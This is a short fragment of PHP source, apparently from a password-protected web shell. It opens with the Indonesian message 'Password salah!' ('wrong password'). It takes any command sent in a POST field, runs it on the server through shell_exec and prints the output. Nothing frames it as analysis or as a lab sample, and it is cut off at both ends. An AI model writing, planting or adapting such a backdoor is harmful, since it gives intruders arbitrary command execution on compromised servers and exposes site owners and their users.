Password salah!
';}}if($_SERVER['REQUEST_METHOD']!=='POST'&&!isset($_POST['password'])){echo'.';if(isset($_GET['auth'])&&$_GET['auth']=='1'){echo'';}exit;}}if($_SERVER['REQUEST_METHOD']==='POST'&&isset($_POST['command'])){$command=$_POST['command'];if(!empty($command)){echo''.htmlspecialchars(shell_exec($command)).'';}}echo'';